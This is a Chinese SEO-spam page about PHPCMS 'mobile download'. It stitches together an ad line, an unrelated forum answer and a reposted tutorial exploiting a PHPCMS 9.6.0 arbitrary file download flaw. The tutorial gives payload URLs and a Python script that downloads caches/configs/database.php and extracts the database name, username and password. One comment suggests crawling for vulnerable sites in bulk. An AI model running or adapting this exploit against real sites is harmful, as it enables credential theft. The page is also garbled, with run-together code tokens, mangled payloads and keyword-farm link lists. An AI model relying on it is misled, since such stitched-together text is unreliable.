建议2-5分钟/篇,防封ip,php5.5-7.0,原创正版,售后保障,盗版无更,防止被割!

phpcms手机下载

编辑整理:整理来源:油管,浏览量:99,时间:2023-04-15 16:32:02

关于phpcms手机下载的问题,我们总结了以下几点,给你解答:

phpcms安装


phpcms安装

phpcms 官方网站或者论坛应该有教程的,如果你是初学者的话 我建议你先学一下宏博cms 宏博cms 是最容易上手的cms 了非常简单易用 www.free158.com.cn 要我发网赚-建站赚钱网上有宏博cms 相关的视频教程,你也可以看一下,宏博官方网站 www.hbcms.com

phpcms手机下载


phpcms手机下载

原创: Free雅轩 合天智汇

前言

学习编写漏洞利用exp,其实原理很简单,就是模拟人工操作。利用代码将漏洞步骤一步步展现出来,今天我们就来和大家一起学习如何编写你自己的exp

实验工具:firefox,burp,phpcms9.6.0

实验语言:Python3.4

实验环境:php+mysql+apache

首先我们先来看看今天的phpcms任意文件下载漏洞复现步骤

这里可以建议大家去看下phpcms任意文件下载代码审计的思路流程。然后再来实际复现一遍。

漏洞复现流程就是按照我们下方的每一步链接走下去!

01

第一步

我们先来获取phpcms/modules/wap/index.php中的cookie值

http://127.0.0.1:9096/phpcms0/index.php?m=wap&c=index&a=init&siteid=1

02

第二步

修改标红部分的文件即为自己想要下载的文件,这里标红部分就是你想要下载的内部文件。也就是在第二部构造我们的下载链接。对应的是构造的payload

http://127.0.0.1:9096/phpcms0/index.php?m=attachment&c=attachments&a=swfupload_json&aid=1&src=&i=1&m=1&d=1&modelid=1&catid=1&s=./caches/configs/database.ph&f=p%3%2%2*70

03

第三步

访问该链接得到_att_json值

http://127.0.0.1:9096/phpcms0/index.php?m=attachment&c=attachments&a=swfupload_json&aid=1&src=&i=1&m=1&d=1&modelid=1&catid=1&s=./caches/configs/database.ph&f=p%3%252%2]index.ph... h&f=p%3%252%2*70C

04

第四步

通过获取到的_att_json值来构造下载payload

05

第五步

通过增加json值认证去访问构造好的下载链接。将get请求中的a_k参数值替换成获取到的_att_json值,并且请求即可。这里后面的标红部分就是获取到的_att_json值

最后点击“点击下载”按钮,即可下载/caches/configs/database.php文件

exp编写

漏洞复现流程走完之后我们就要来按照漏洞复现流程进行编写我们的exp:

#-*-coding=utf-8 -*-

#author = Free雅轩

importrequests

#导入requests模块,模拟爬取访问网页

importre

#导入re正则模块,对网页中我们所需的内容进行匹配

fromurllib.parse import quote

#从urllib.parse模块中导入quote方法,用于对传递进来的url进行编码re

TIMEOUT= 3

#设置网页响应超时时间为3秒

url= r'http://127.0.0.1:9096/phpcms9.0'

#定义URL地址

#这里其实是可以利用采集工具/模拟引擎来进行爬取PHPCMS的关键字来进行批量读取/验证操作

payload=r'&id=1&m=1&f=caches/configs/database.ph%3C&modelid=1&catid=1&s=&i=1&d=1&'

#定义漏洞利用payload

cookies= {}

#设置cookie

#步骤一 获取cookie

step1= '{}/index.php?m=wap&c=index&a=init&siteid=1/'.format(url)

print('step1:{}'.format(step1))

#模拟人工操作构造第一个payload

response1_cookies= requests.get(step1 , timeout=3).cookies

#将第一步的url和cookies结合并赋值给response_cookies,设置url响应超时时间为3秒

fori in response1_cookies:

print(i)

if i.name[-7:] == '_siteid':

cookies_head = i.name[:6]

cookies[cookies_head + '_userid' ] = i.value

cookies[i.name] = i.value

print(cookies)

#步骤二 获取_att_json

step2='{}/index.php?m=attachment&c=attachments&a=swfupload_json&src={}'.format(url, quote(payload))

print('step2:{}'.format(step2))

response2_cookies= requests.get(step2 , timeout=3 , cookies=cookies).cookies

forj in response2_cookies:

if j.name[-9:] == '_att_json':

enc_payload = j.value

#步骤三 获取构造下载链接

step3= '{}/index.php?m=content&c=down&a_k={}'.format(url,enc_payload)

print('step3:{}'.format(step3))

#步骤四 利用requests模块中的text方法将网页输出,将获取到的链接中的db,username,password等重要信息匹配出来

step4= requests.get(step3 , timeout=3 , cookies=cookies).text

file= re.findall(r'<a href="(.+?)"',step4)[0]

downfile_url= '{}/index.php{}'.format(url, file)

print(downfile_url)

ret= requests.get(downfile_url).text

print(ret)

re_db= r"'database' => '([\S]+)'"

re_username= r"'username' => '([\S]+)'"

re_password= r"'password' => '([\S]+)'"

db =re.search(re_db, ret).group(1)

username= re.search(re_username, ret).group(1)

password= re.search(re_password, ret).group(1)

print(db,username, password)

exp利用

(注:本文属于合天原创投稿奖励,未经允许,禁止转载!)

phpcms手机端


phpcms手机端

行业热门话题:

【phpcms手机端】【phpcms安装】【php手机版下载】【phpcms手机版模板】【phpcms v9安装教程】【phpcms v9官网】【phpcms api】【phpcms手册】【phpcms教程】【phpcms手机端和pc端制作】
phpcms手机下载完!

相关推荐:

phpcms手机下载

phpcms手机下载,phpcms v9安装教程,phpcms手机端和pc端制作

作者:整理来源:油管,时间:2023-04-15 16:32,浏览:100



关键词文章生成器,点击查看演示目录:http://www.wskqs.cn/shisange/


朔州软文营销发布渠道哪个好| 女孩跳江轻生3名小伙救人溺亡| 推广平台软文问答金石网络下拉| 幼儿园实用菜谱精选-正规幼儿园食谱大全菜谱表| 七夕蛋糕营销软文 连州连州镇七夕蛋糕营销软文| 佛山共享单车软文营销-共享单车软文营销方案| 龙门装修销售接单流程| 蔡桥镇出售短视频获客系统| phpcms怎么修改栏目宽带| 西北大学经管学院|
投稿| 1024(定向养站+文章采集+ai聚合)目录程序| 1888(定向养站+文章采集+ai聚合)泛目录版| 双标题| 挖关键词| 违禁词删除| 免费配图| 自助解答| 站长变现| 今日头条| 问答聚合| 818(今日头条资讯聚合演示)| 1024(采集聚合+ai聚合)| 1024 (AI定向养站目录程序)| 淘客文章带货| 伪原创| 定向养站目录程序| ai写作目录程序

苏ICP备2021004623号 (免责声明:本网站部分内容由用户自行上传,如权利人发现存在侵犯其权益情形,请及时与本站联系。)(版权所有:昆山市一路火信息技术服务中心) 友情导航 网络警察提醒您 中国互联网辟谣平台 中国文明网传播文明 中国互联网举报中心